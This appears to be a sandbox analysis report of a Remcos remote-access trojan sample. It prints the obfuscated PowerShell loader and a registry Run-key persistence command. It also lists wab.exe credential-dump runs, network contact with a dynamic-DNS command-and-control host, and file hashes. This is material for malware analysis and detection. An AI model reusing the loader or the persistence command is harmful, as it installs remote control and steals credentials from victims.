$Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\akhpayfeeygtlj"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\akhpayfeeygtlj"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kmnibrpgsgygoxzje"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kmnibrpgsgygoxzje"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ngaacjazgoqkydnnvcao"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
NL 23.62.61.88:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 88.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 ab9001.ddns.net udp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
US 8.8.8.8:53 228.67.156.94.in-addr.arpa udp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
US 8.8.8.8:53 geoplugin.net udp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
NL 94.156.67.228:9001 ab9001.ddns.net tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/4372-0-0x00007FF8E44D3000-0x00007FF8E44D5000-memory.dmp

memory/4372-1-0x00000107BFBC0000-0x00000107BFBE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wev2xnct.zrm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-11-0x00007FF8E44D0000-0x00007FF8E4F91000-memory.dmp

memory/4372-12-0x00007FF8E44D0000-0x00007FF8E4F91000-memory.dmp

memory/1464-15-0x00000000053C0000-0x00000000053F6000-memory.dmp

memory/1464-16-0x0000000005AE0000-0x0000000006108000-memory.dmp

memory/1464-17-0x0000000006110000-0x0000000006132000-memory.dmp

memory/1464-18-0x0000000006230000-0x0000000006296000-memory.dmp

memory/1464-19-0x0000000006350000-0x00000000063B6000-memory.dmp

memory/1464-29-0x00000000063C0000-0x0000000006714000-memory.dmp

memory/1464-30-0x0000000006970000-0x000000000698E000-memory.dmp

memory/1464-31-0x00000000069C0000-0x0000000006A0C000-memory.dmp

memory/1464-32-0x00000000081C0000-0x000000000883A000-memory.dmp

memory/1464-33-0x0000000006F10000-0x0000000006F2A000-memory.dmp

memory/1464-35-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

memory/1464-34-0x0000000007C20000-0x0000000007CB6000-memory.dmp

memory/1464-36-0x0000000008DF0000-0x0000000009394000-memory.dmp

C:\Users\Admin\AppData\Roaming\Narco.Fla

MD5 5b31fdcca43851229c6ad5c0d5124d9e
SHA1 95243324bfd6acd008518e233e5ac3a7a29e67a5
SHA256 c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
SHA512 e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5

memory/1464-38-0x00000000093A0000-0x000000000C06B000-memory.dmp

memory/4372-39-0x00007FF8E44D3000-0x00007FF8E44D5000-memory.dmp

memory/4372-53-0x00007FF8E44D0000-0x00007FF8E4F91000-memory.dmp

memory/4372-57-0x00007FF8E44D0000-0x00007FF8E4F91000-memory.dmp

memory/996-54-0x0000000001E60000-0x0000000004B2B000-memory.dmp

memory/4840-62-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4840-64-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4660-65-0x0000000000400000-0x0000000000457000-memory.dmp

memory/4012-73-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4012-72-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4012-69-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4660-66-0x0000000000400000-0x0000000000457000-memory.dmp

memory/4660-67-0x0000000000400000-0x0000000000457000-memory.dmp

memory/4840-63-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\akhpayfeeygtlj

MD5 73ddf6cd83c2ad8a2fbb2383e322ffbc
SHA1 05270f8bb7b5cc6ab9a61ae7453d047379089147
SHA256 0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409
SHA512 714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d

memory/996-81-0x0000000021060000-0x0000000021079000-memory.dmp

memory/996-80-0x0000000021060000-0x0000000021079000-memory.dmp

memory/996-77-0x0000000021060000-0x0000000021079000-memory.dmp

C:\Users\Admin\remcos\logs.dat

MD5 7d3259f6ba6a2b1465e90cd169c66f20
SHA1 b9f9b0330af8846e3c76f544cb16f93ecb99cd2b
SHA256 fc1abac31d2f9115e61cbded1caa0425b705c3d2a3722f4c1cbaf1c463c85dcd
SHA512 5312338886a269e467a6747a78edb73eb5d391af00fec3548519503456a5a7323af340126a031e5c087f62c94b7c89c1316d403d8430972d6566672433eabcbd